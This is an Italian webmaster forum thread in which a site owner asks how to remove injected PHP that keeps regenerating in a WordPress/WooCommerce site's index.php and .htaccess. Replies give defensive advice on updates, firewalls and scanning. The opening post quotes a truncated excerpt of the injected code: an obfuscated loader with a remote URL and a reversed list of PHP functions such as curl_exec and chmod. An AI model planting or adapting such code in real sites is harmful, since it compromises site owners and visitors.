+ Rispondi alla Discussione
Risultati da 1 a 10 di 10

[Dominio] File con permessi 444 e codice malevolo

Ultimo Messaggio di Giorgiotave il:
  1. #1
    Utente Premium L'avatar di felino
    Data Registrazione
    Nov 2009
    Località
    Acicatena - Catania
    Messaggi
    1,816
    Aggiungi felino su Facebook Aggiungi felino su Linkedin

    [Dominio] File con permessi 444 e codice malevolo

    Buongiorno a tutti,
    ho un dominio su Aruba, nel ho pubblicato:
    - un ecommerce nella directory /shop
    - un file index.php nella root che al momento fa un redirect alla cartella /shop

    Da un mesetto circa il file index.php e' stato modificato (non da me) con del codice malevole con tutte le conseguenze del caso.

    Il problema e' che tale file ha i permessi settati a 444, provo a modificarli e ottengo un messaggio di errore.
    Ho richiesto supporto ad Aruba.it per la cancellazione, una volta cancellato viene generato nuovamente.
    Stesso identico problema ce l'ho con il file .htaccess

    Qualche suggerimento?

    Qui una parte del contenuto:
    Codice:
    <?php @'$
    yumingid=47
    lineid=2332
    x3=index.php/
    x4=ghpyxlOwbV
    x5=underlying,roadside,alone,ethics,smaller,hotpants,agree,jasper,horse,Baby,stick,despair,SharkFin,bulk,Apprentice,whole,plow,coconutmilk,trunklineelectrification,inspire,impossible,pantyhose,earthquake,sage,BarberShop,carrier,evidence,English,Latin,definite
    x6=
    x7=http://jnice01.ouuwtizhy573nskt/weilai0.php
    cache=0000
    sps=111111000
    urlgz=[0:3]^[0:8]-[0:6~12][1:6]/[0:8~10]!/|[0:7~10]^/[1:8]/!/[0:10~15]/|[0:8~10]^-[2:10~12]-[2:4]-[2:6]-!/|^-[2:8~12]-[2:5~10]-[0:5][1:8]/![0:3]/|^[0:10~12]/[0:1]_[2:8~12]-!/|[0:10~12]^/[0:6~12]_[1:6]-!/|[0:10~15]_[0:6~10]-^-![0:2]/|[0:10~12]-[0:1]^-[0:4]-[0:1]!-[0:10~12]/|[0:1]^-[0:3]-[0:10~12]-[0:5]-[0:5]!/|^/[0:10~12]_[1:3~5][0:4]-[0:8]-!/|^[0:5]_[1:5]_[2:12~15]_!|[0:3~5]-^-[1:10~12]-[0:10~12]/![0:2]|^[0:6~8]/[1:8~12]-!/[0:5~8]|^_[1:6~8]_[1:6~8]/[2:8~12]_[0:5~8]/!|[0:12]_^-[2:10~15]_[0:6~8]_!|[0:10~15]/^-[1:6~8]/!|^[3:6~10]/[0:1]_[2:12]_!|[0:8]/[0:6~8]/^-!/[0:8~10].php|^/[2:10~12]/[1:8~10]-!-[0:3].jp|^_[1:6~8]/[1:6~8]_[0:10~12][1:5]/!.jp|[0:3]^[0:3]-[2:8]-[1:5][0:3]-[2:6]-[0:6][1:4]/[0:2]!.html|[0:8~10]/^-!/[0:15~18].html|[0:6~8]/[0:15~18]/^-!.html
    ';$bbb6b6b66=explode("1l","tilps_gerp1ledocnelru1lemaner1lyarra_ni1lezilairesnu1lstegf1l5dm1lcexe_lruc1lofniphp1lstnetnoc_teg_elif1lrtsbus1ldomhc1llla_hctam_gerp1ldnar_tm1lrewolotrts1lnelrts1lrhc1letad1lemit1lemitmelif1lliec1lgnol2pi1lnepof1ltroba_resu_erongi1lsehsalscdda1ldnar_yarra1llru_esrap1lenifed1ledocedlru1lemanybtsohteg1lelffuhs1lfoef1lrtrts1ltini_lruc1ltfihsnu_yarra1lftnirps1ledolpmi1lciremun_si1lhcuot1letirwf1lyarra_si1lemitotrts1ltimil_emit_tes1lredaeh1legrem_yarra1leuqinu_yarra1ltrats_bo1ltnuoc1lelif_si1lstsixe_noitcnuf1lstsixe_elif1lhctam_gerp1lecalper_gerp1leikooctes1lsoprts1lmirt1lsopirts1lrddaybtsohteg1ltcartxe1legnar1lesolcf1ldro1ledolpxe1lpop_yarra1lsoprrts1lesolc_lruc1ltpotes_lruc1lecalper_rts");foreach($bbb6b6b66 as$b6bbbbbbb=>$bbbb6b6)
    .....

  2. #2
    Moderatore L'avatar di Sermatica
    Data Registrazione
    Oct 2016
    Località
    Maleo
    Messaggi
    4,399
    Aggiungi Sermatica su Facebook
    Ciao
    hai una falla nel sito, che Cms usi? E' tutto aggiornato? Se si ricontatta l'Hosting e chiedigli la risoluzione o identificazione del problema. Se non rispondono o identificano cambia Hosting.
    MODHelp Center: consigli per il tuo progettoMODE-Commerce
    Consulente con P.IVA: SEO / SEM / Google Business / Amazon - Sermatica.it


  3. #3
    User L'avatar di Shazan
    Data Registrazione
    Oct 2005
    Località
    Catania
    Messaggi
    425
    Citazione Originariamente Scritto da felino Visualizza Messaggio
    Buongiorno a tutti
    Ciao,

    Citazione Originariamente Scritto da felino Visualizza Messaggio
    Qualche suggerimento?
    Sì, quello di trasferirlo altrove, magari presso qualcuno che ha un filtro antimalware/antivirus sul server...
    Noamweb- Domini, hosting, VPS, server dedicati

  4. #4
    User Newbie L'avatar di utixo cloud
    Data Registrazione
    Mar 2019
    Località
    Milano
    Messaggi
    5
    Aggiungi utixo cloud su Linkedin
    La fate un po facile !
    qui hanno usato una vulnerabilita applicativa per accedere al file system, l'hoster puo fare dei controlli ed avere anche tool di antivirus ma se il codice e scritto male ce poco da fare, se tu scrivi un codice che permette l'upload di files non sicuro ci metto 5 minuti ad usarlo e l'hoster che fa lo blocca? L'applicazione deve essere scritta in modo corretto e sicuro altrimenti l'ISP non puo rimediare e se LO FA avrai 1000 problem perché TROPPA sicurezza vuole dire non fare funzionare 1000 cose… la risposta semplice e cambia provider e poi continua a cambiarlo, non e suo compito garantire al sicurezza applicativa.

    Utixo Cloud Services

  5. #5
    User L'avatar di Shazan
    Data Registrazione
    Oct 2005
    Località
    Catania
    Messaggi
    425
    Citazione Originariamente Scritto da utixo cloud Visualizza Messaggio
    se tu scrivi un codice che permette l'upload di files non sicuro ci metto 5 minuti ad usarlo e l'hoster che fa lo blocca?
    Sì, siamo nel 2019, un buon application firewall può riconoscere e bloccare dei POST malevoli senza grossi problemi, sia tramite signature che tramite predizioni di tipo euristico, con basso rischio di falsi positivi.
    Poi è chiaro che può sempre esserci un zeroday o qualcosa possa sfuggire al controllo ma, nel caso specifico, disponendo del codice malevolo, se è sempre lo stesso, non è che ci voglia granchè a bloccarlo...
    Noamweb- Domini, hosting, VPS, server dedicati

  6. #6
    User Newbie L'avatar di utixo cloud
    Data Registrazione
    Mar 2019
    Località
    Milano
    Messaggi
    5
    Aggiungi utixo cloud su Linkedin
    Citazione Originariamente Scritto da Shazan Visualizza Messaggio
    Sì, siamo nel 2019, un buon application firewall può riconoscere e bloccare dei POST malevoli senza grossi problemi, sia tramite signature che tramite predizioni di tipo euristico, con basso rischio di falsi positivi.
    Poi è chiaro che può sempre esserci un zeroday o qualcosa possa sfuggire al controllo ma, nel caso specifico, disponendo del codice malevolo, se è sempre lo stesso, non è che ci voglia granchè a bloccarlo...
    La sicurezza e' una cosa piu complessa che installare semplicemente un antivirus da pochi Euro sul server o abilitare il mod_security ... ci sono piu livelli da proteggere dal sistema operativo al layer del pannello di controllo, all'interprete PHP e anche all'applicativo ...senza entrare nel merito preciso nel caso è difficile dare un giudizio se e colpa di Aruba o no ... e questo che voglio dire ..
    Utixo Cloud Services

  7. #7
    Utente Premium L'avatar di felino
    Data Registrazione
    Nov 2009
    Località
    Acicatena - Catania
    Messaggi
    1,816
    Aggiungi felino su Facebook Aggiungi felino su Linkedin
    Grazie del supporto.

    L'ecommerce e' realizzato tramite Wordpress + WooCommerce.

    Ho preso in gestione il tutto da qualche settimana.
    Il problema, secondo me, e' stato generato da una backup sul dominio stesso di una versione di Woordpress+Woocommerce abbastanza datata!

    Ho provveduto ad eliminare il superfluo ed aggiornare il CMS, i relativi plugin ed il theme con l'ultima versione online.

  8. #8
    Utente Premium L'avatar di Xlogic
    Data Registrazione
    Jan 2011
    Località
    Torino
    Messaggi
    468
    Se nel tuo hosting non è presente un anti-malware o anti-virus esegui una scansione con sucuri: https://sitecheck.sucuri.net/

    Ciao.

  9. #9
    Utente Premium L'avatar di felino
    Data Registrazione
    Nov 2009
    Località
    Acicatena - Catania
    Messaggi
    1,816
    Aggiungi felino su Facebook Aggiungi felino su Linkedin
    Ecco qui il risultato della scansione:
    Outdated Software Detected PHP under 5.6.40 Vulnerabilities on PHP 5.6
    Outdated Software Detected WordPress under 5.1.1/5.0.4/4.9.10

    Ovviamente sto gia' provvedendo all'aggiornamento di entrambi.

    Grazie per avermi segnalato questo tool.





    Security Updates

  10. #10
    L'avatar di Giorgiotave
    Data Registrazione
    Oct 2004
    Località
    Monasterace
    Messaggi
    42,771
    Visita il canale Youtube di Giorgiotave
    Ho eliminato i post di utixo cloud e francois. A quest'ultimo è stata data la possibilità di scegliere tra chiedere scusa per il modo in cui ha risposto oppure di presentare le dimissioni come moderatore. Si è dimesso.

    Vi prego di continuare con la discussione e di stare tranquilli, non c'è bisogno di alzare i toni per discutere civilmente.

    Se avete dubbi io in privato ci sono sempre.

    Altrimenti la prossima volta vi allontaniamo dal forum, ci sono tanti altri luoghi su Internet dove arrabbiarsi e insultarsi. Non da noi

    Controlla i corsi base di Search On: SEO, Google Ads e Web Analytics.
    Se ti interessa qualcosa di più avanzato ti consiglio il Social Media Strategies e il Search Marketing Connect.

+ Rispondi alla Discussione

Tag per Questa Discussione

^ Permessi di Scrittura

  • Tu non puoi inviare nuove discussioni
  • Tu non puoi inviare risposte
  • Tu non puoi inviare allegati
  • Tu non puoi modificare i tuoi messaggi
  •  
  • Il codice BB è Attivato
  • Le faccine sono Attivato
  • Il codice [IMG] è Attivato
  • Il codice [VIDEO] è Attivato
  • Il codice HTML è Disattivato
  • Trackbacks Attivato
  • Pingback Attivato
  • Refback Attivato

SEO by vBSEO 3.6.0 PL2 ©2011, Crawlability, Inc.